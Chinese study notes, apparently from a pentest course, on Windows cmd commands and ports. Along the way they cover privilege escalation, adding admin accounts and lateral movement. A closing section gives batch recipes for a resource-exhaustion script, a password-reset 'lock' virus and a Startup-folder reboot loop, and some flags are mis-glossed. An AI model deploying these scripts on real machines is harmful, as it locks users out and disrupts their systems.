Windows基础

系统配置

linux:/etc /proc

win:注册表

windows命令

help

常用命令

cd
cmd 
copy 
dir
echo
more
mkdir
rmdir删除目录
type 显示文本内容

find命令

find [/V] [/C] [/N] [/I] [/OFF[LINE]] "string" [[drive:][path]filename[...]]

/V
显示所有未包含指定字符串的行。
例如：find /V "hello" test.txt，会显示test.txt文件中不包含hello字符串的所有行。
/C
计算包含指定字符串的行数。
例如：find /C "error" log.txt，会返回log.txt文件中包含error字符串的行数。
/N
在每行前面显示行号。
例如：find /N "keyword" document.doc，会在包含keyword字符串的行前面显示该行在文件中的行号。
/I
忽略字符串的大小写。
例如：find /I "Windows" system.ini，会找到system.ini文件中包含Windows（无论大小写）的行。
/OFF[LINE]
不要跳过具有脱机属性集的文件。如果没有指定，find将跳过这些文件。
"string"
要查找的字符串，必须用双引号括起来。
[[drive:][path]filename[...]]
指定要搜索的文件或文件集。可以是一个文件，也可以是多个文件（用空格分隔），还可以使用通配符（如*.txt）来搜索某一类型的文件。

示例

find "apple" C:\test\*.txt
find /C "apple" C:\test\*.txt

del命令 erase命令

del [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names
/P：在删除每个文件之前提示确认。例如，del /P test.txt会在删除test.txt文件前询问是否确认删除。
/F：强制删除只读文件。如果要删除一个被设置为只读属性的文件，可使用del /F read - only.txt。
/S：删除指定目录及其所有子目录中的文件。比如del /S *.tmp会删除当前目录及其子目录下的所有.tmp文件。
/Q：安静模式，删除时不提示确认（与/P相反）。例如del /Q oldfiles会不提示地删除oldfiles目录下的所有文件（如果没有其他保护机制）。
/A[[:]attributes]：根据文件属性选择要删除的文件。例如del /A:R *.txt会删除所有具有只读属性的.txt文件。

erase命令在一些批处理脚本（.bat 文件）中可能会因为历史原因或者脚本编写者的偏好而被使用

ren重命名

基本语法为：ren [drive:][path]filename1 filename2
[drive:][path]filename1：这是要重命名的原始文件或目录的位置和名称，包括驱动器号、路径和文件名。
filename2：这是文件或目录的新名称。
示例：
简单文件重命名
假设在C:\Users\Test目录下有一个文件名为oldfile.txt，要将其重命名为newfile.txt，可以在命令提示符下输入：
ren C:\Users\Test\oldfile.txt newfile.txt
批量重命名文件
可以使用通配符来批量重命名文件。例如，要将C:\Users\Test目录下所有以.tmp结尾的文件重命名为以.bak结尾的文件，可以使用：
ren C:\Users\Test\*.tmp *.bak
重命名目录
重命名目录的操作方式与文件类似。例如，要将C:\Temp\oldfolder目录重命名为newfolder，可以使用：
ren C:\Temp\oldfolder newfolder

for命令

遍历文件并显示文件名
cmd中：
for %i in (*.txt) do echo %i
批处理中：
for %%i in (*.txt) do echo %%i

dir/s flag.txt

• 整体这条命令的作用是在当前目录及其所有子目录中查找flag.txt文件，并显示包含该文件的目录路径以及文件的相关信息（如文件大小、创建时间等）。

set

列出当前环境变量

常见端口及服务

ftp 21
telnet 23
80 web
443 ssl滴血及web漏洞测试
445 smb
1433 mssql
2082/2083 cpanel主机管理系统登录（国外多）
2222 da虚拟主机管理系统登录（国外多）
3128 squid代理默认端口-漫游内网
3306 mysql
3312/3311 kangel主机管理系统登录
3389 远程桌面
5432 postgreSQL
5900 VNC
6379 redis 未授权
7001 7002 weblogic默认弱口令、反序列化漏洞
7778 kloxo 主机控制面板登录
8000-9090 常见web端口  管理后台
8080 tomcat wdcp主机管理系统 默认弱口令
8080 8089 9090 jboss
8083 vestacp主机管理系统（国外多）
8649 ganglia
8888 宝塔 主机管理默认端口
10000 服务器虚拟主机管理系统
11211 memcache未授权访问
27017 27018 MongoDB未授权访问
28017 MongoDB 统计系统页面

常用cmd命令

echo

echo /?
echo 1
echo 1 > 1.txt
echo 123456>> 1.txt 追加内容

dir

展示当前目录

cd d: c:

cd . 进入当前目录
cd .. 上级目录
cd /文件夹
cd desktop 切到桌面

tree

tree /?
tree /f
tree /a
tree C:/ /f 
tree C:/ /a
tree C:\Users\Administrator /f
tree C:\Users\Administrator /a  常用

md创建目录 rd删除目录

md kkk
rd kkk

ipconfig

ipconfig /all  查看完整网络信息

cls 清屏

copy 复制、拼接文件

copy /?
copy 1.txt ..\1.txt
copy 1.txt desktop\2.txt  复制并重命名
copy 1.txt+2.txt 3.txt  拼接1.txt 2.txt内容到3.txt

move文件移动

move ..\1.txt 2.txt  移动并重命名
相当于剪切

ren重命名

ren 1.txt 11.txt

del删除

del 2.txt 3.txt 这个命令删除的文件不会进入回收站，是永久删除

ping

ping /?
ping -t
ping -6 IP 强制IPv6 ping

type 显示文本文件内容

reg 注册表

reg /?

nslookup探测域名信息

nslookup 域名
nslookup -d 域名   查看历史解析记录

find

find /?
find "666" 1.txt
find /n "666" 1.txt
type 1.txt | find "666"

tasklist

列出当前进程

tasklist | find /i "cal" 查找计算器进程

taskkill

taskkill /pid 31968
taskkill /pid 31968 /f 强制杀死进程 

ver winver 显示版本

winver会弹窗

start

start cmd
start calc
start ping xxx.com -t

systeminfo

查看系统信息

查看补丁信息，后期提权就是针对不同的修补持续进行提权，例如少打了哪些补丁就可以根据这个进行提权。

logoff 注销

利用该命令注销掉其他3389会话，让自己连接

shutdown

shutdown /s 一分钟关机
shutdown /a 取消计划关机
shutdown /r 重启
shutdown /g 一分钟关机
shutdown /r /t 0 0立即执行  /t设置时间

telnet

控制面板 程序 打开关闭windows功能 telnet客户端勾选

arp ip和物理机的映射关系表

arp -a
arp /a  在拿到内网机器后，通过这条命令查看当前内网有哪些主机以助于横向移动，用于发现同一网络有哪些主机

at 定时任务

at "shutdown /r /t 0"
at 1 /delete

net 服务 重要⭐⭐⭐

net stop telnet
net start telnet
net user 查看有哪些用户
net user admin 123 /add 创建一个用户
net user admin 查看该用户权限
net user administrator 查看administrator权限
把admin变为管理员权限
net localgroup administrators admin /add提权   admin添加到本地组的administrators
net user admin 
net user admin /del
net user administrator /active:yes 设置账户激活

病毒编写

资源耗尽病毒

echo start cmd > 1.txt
echo %0 >> 1.txt  无限双击  无限启动
%0表示自身文件名
ren 1.txt 1.bat

win10上不成功。
TODO装个win7试一下

锁机病毒

echo net user administrator 123456 > c:\windows\Temp\1.bat 尝试修改administrator密码，没有该文件会创建文件
echo shutdown /n /t 0 >> c:\windows\Temp\1.bat /n表示强制，/t 0表示立刻

无限重启病毒

echo shutdown /n /t 0 > c:\windows\Temp\1.bat
copy c:\windows\Temp\1.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start\Menu\Programs\Startup\"
本机开机自启目录是"%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
c:\windows\Temp\1.bat重启自动清空缓存